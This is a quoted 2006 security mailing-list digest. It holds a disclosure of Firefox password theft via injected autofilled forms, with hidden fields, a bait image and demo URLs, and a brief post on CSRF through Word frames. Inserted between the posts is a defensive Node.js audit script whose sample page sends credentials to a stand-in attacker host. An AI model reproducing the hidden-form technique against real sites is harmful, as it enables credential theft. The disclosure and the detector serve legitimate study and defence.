Thread-topic: Stealing FF passwords and CSRF with MS Word
> ------------------------------
>
> Message: 2
> Date: Fri, 24 Nov 2006 13:41:55 +0000
> From: pagvac <unknown.pentester@xxxxxxxxx>
> Subject: [Full-disclosure] RCSR fun: stealing FF passwords the easy
> way
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <b7a807650611240541r88576ei28ea6cf19189c23c@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> RCSR (Reverse Cross-Site Request) attacks, discovered by Robert Chapin,
> make the theft of passwords in Firefox extremely trivial. I encourage
> you to try the attack as it can be kind of a shocking experience.
>
> Scenario:
>
> 1. User logs into www.target.com through a typical HTML login form
>
> 2. Firefox asks the user if he/she wants to save the password -
> provided that FF never asked the user to save the password for that
> site before ("Remember passwords for sites" under "Options/Security"
> must be *enabled*)
>
> 3. Victim user clicks on "Remember"
>
> 4. Victim user accesses an HTML page on www.target.com containing an
> injected HTML form with the username and password input names *equal*
> to the legitimate login form from step 1
>
> 5. Firefox automatically fills out the form with the original username
> and password values
>
> 6. Victim user clicks on a malicious link
>
> 7. Credentials get sent to evil site!
>
> Now, the form can be completely invisible by adding a bit of HTML to
> the form inputs. I managed to create a form in which all you need is
> trick the victim user to click on an image.
>
>
> Attack walk through:
>
> 1. Enter any fake credentials on
> http://ikwt.com/projects/RCSR/legit_form.html and click on "Login"
>
> 2. If "Remember passwords for sites" is enabled, FF should prompt you
> to save the password.
>
> 3. Click on "Remember"
>
> 4. Now, in order to illustrate that FF will automatically fill in the
> credentials on any form located on the same site which uses input
> names *equal* to the legitimate form, access the following URL:
>
> http://ikwt.com/projects/RCSR/evil_form.html
>
> If it worked, you should see the username and password field filled in
> automatically by FF. Of course, an evil form like this looks very
> suspicious, but this is just an example to make the point that FF
> trusts and fills in the form simply because it's located on the same
> site and uses input names equal to the legitimate form.
>
> Now, in order to make our evil form more effective we just added the
> following in the username and password fields:
>
> style="display: none;"
>
> Finally, we change our submit button for an image that will make a
> good bait. In this case we choose beautiful Scarlett Johansson :-)
>
> If you click on the image, you should see your credentials forwarded
> to Google within the URL:
>
> http://ikwt.dyndns.org/projects/RCSR/evil_form_2_without_JS.html
>
>
>
> The beauty of this attack is that we don't need JavaScript, it's all
> plain HTML tags. Also, there is *no* patch yet. Apparently this has
> been widely exploited on myspace. I recommend that everyone research
> this attack as it's highly exploitable on sites in which users can
> insert HTML - either through legitimate features (i.e.: posts) or by
> exploiting security bugs such as HTML injection.
>
> Notes:
>
> - tested successfully on Mozilla Firefox 2.0
> - JavaScript can also be used to exploit this vulnerability through
> the 'submit()' method (only visiting the evil page is required in this
> case)
>
>
> Check out the following links for more info:
>
> http://www.info-svc.com/news/11-21-2006/
> http://news.zdnet.com/2100-1009_22-6137844.html
> http://secunia.com/advisories/23046/
> http://isc.sans.org/diary.php?storyid=1879&rss
> http://www.informationweek.com/news/showArticle.jhtml?articleID=195900085
> http://www.kriptopolis.org/robo-de-contrasenas-en-firefox (in Spanish)
>
> --
> pagvac
> [http://ikwt.com/]
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: FF_remember_passwords.JPG
> Type: image/jpeg
> Size: 8310 bytes
> Desc: not available
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061124/5a18067f/attachment-0001.jpe
>
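The condition pagvac describes (a form on the same site, with inputs named like the remembered login form, whose action points off-site) can be audited mechanically. The script below is an added example and is not code from the post or from the ikwt.com demo pages: it is a Node.js script that parses the forms on a page, applies the autofill rule exactly as the post states it (same site plus same input names, which is a model of that statement and not Firefox's real implementation), and flags forms whose autofilled credentials would be submitted cross-origin. The sample page, the `evil.example` host and the field names `username`/`password` are all constructed for illustration.

```javascript
// Added example (not from the original post): audits a page's forms for the RCSR
// pattern described above. The autofill rule is the post's statement (same site +
// same input names), NOT Firefox's actual password-manager logic.

// Constructed: what the browser remembered after the victim clicked "Remember".
const SAVED_LOGIN = {
  site: "http://www.target.com",   // site the credentials were saved for
  userField: "username",           // assumed name of the legitimate username input
  passField: "password",           // assumed name of the legitimate password input
};

// Constructed sample page on www.target.com: the legitimate login form followed by
// an injected form (hidden credential fields, image as bait, action on an attacker host).
const SAMPLE_PAGE = `
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>
<!-- user-supplied HTML starts here -->
<form action="http://evil.example/collect" method="get">
  <input type="text" name="username" style="display: none;">
  <input type="password" name="password" style="display: none;">
  <input type="image" src="bait.jpg" alt="click me">
</form>`;

// Minimal attribute parser for one tag's attribute string (no entity decoding).
function parseAttrs(attrString) {
  const attrs = {};
  const re = /([a-zA-Z_:][\w:.-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(attrString)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
  }
  return attrs;
}

// Extracts every <form> together with its <input> elements from an HTML string.
function parseForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  const inputRe = /<input\b([^>]*)>/gi;
  let fm;
  while ((fm = formRe.exec(html)) !== null) {
    const inputs = [];
    let im;
    inputRe.lastIndex = 0;
    while ((im = inputRe.exec(fm[2])) !== null) inputs.push(parseAttrs(im[1]));
    forms.push({ attrs: parseAttrs(fm[1]), inputs });
  }
  return forms;
}

// True when the victim would not see the input (the post's display:none trick included).
function isHidden(input) {
  const style = (input.style || "").replace(/\s+/g, "").toLowerCase();
  const type = (input.type || "").toLowerCase();
  return type === "hidden" || style.includes("display:none") || style.includes("visibility:hidden");
}

// The rule as the post states it: the browser fills the saved credentials into any
// form on the same site whose inputs use the same names as the remembered form.
function wouldAutofill(saved, pageUrl, form) {
  if (new URL(pageUrl).origin !== new URL(saved.site).origin) return false;
  const names = new Set(form.inputs.map((i) => i.name));
  return names.has(saved.userField) && names.has(saved.passField);
}

// For each form: would it be autofilled, and where would a submit send the values?
function auditForms(html, pageUrl, saved = SAVED_LOGIN) {
  const pageOrigin = new URL(pageUrl).origin;
  return parseForms(html).map((form) => {
    const action = new URL(form.attrs.action || "", pageUrl);
    const credInputs = form.inputs.filter((i) => i.name === saved.userField || i.name === saved.passField);
    const finding = {
      action: action.href,
      autofilled: wouldAutofill(saved, pageUrl, form),
      crossOrigin: action.origin !== pageOrigin,
      hiddenCredentialFields: credInputs.filter(isHidden).map((i) => i.name),
      imageSubmit: form.inputs.some((i) => (i.type || "").toLowerCase() === "image"),
    };
    // Autofilled credentials that leave the site on submit: that is the RCSR pattern.
    finding.rcsr = finding.autofilled && finding.crossOrigin;
    return finding;
  });
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditForms(SAMPLE_PAGE, "http://www.target.com/profile.html"), null, 2));
}
```

Run with `node rcsr_audit.js`: the legitimate form is reported as autofilled but same-origin, while the injected form is autofilled, hides both credential fields, submits via an image and posts cross-origin, so it is flagged `rcsr: true`. Evaluating the same HTML as if it lived on `evil.example` shows why the attack needs same-site injection: the model refuses to autofill at all there. The regex-based form extraction is deliberately simple and will miss obfuscated markup; it is meant to show the check, not to replace a real HTML parser.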
> ------------------------------
>
> Message: 7
> Date: Fri, 24 Nov 2006 19:12:32 +0000
> From: "David Kierznowski" <david.kierznowski@xxxxxxxxx>
> Subject: [Full-disclosure] CSRF with MS Word
> To: full-disclosure@xxxxxxxxxxxxxxxxx, "Webappsec Mail List"
> <webappsec@xxxxxxxxxxxxxxxxx>,
> security-basics@xxxxxxxxxxxxxxxxx
> Message-ID:
> <f4cd4c010611241112s74dad423o4f00a574c7e0bd67@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> CSRF with MS Word
>
> Our attack vector is found in exploiting MSWord's frame capabilities:
> By creating malicious frames in a document and pointing them to a
> malicious URL, we can exploit multiple, persistent (well almost, this
> is limited) CSRF vulnerabilities (and possibly the browser).
>
> See:
> http://michaeldaw.org/md-hacks/csrf-with-msword/
>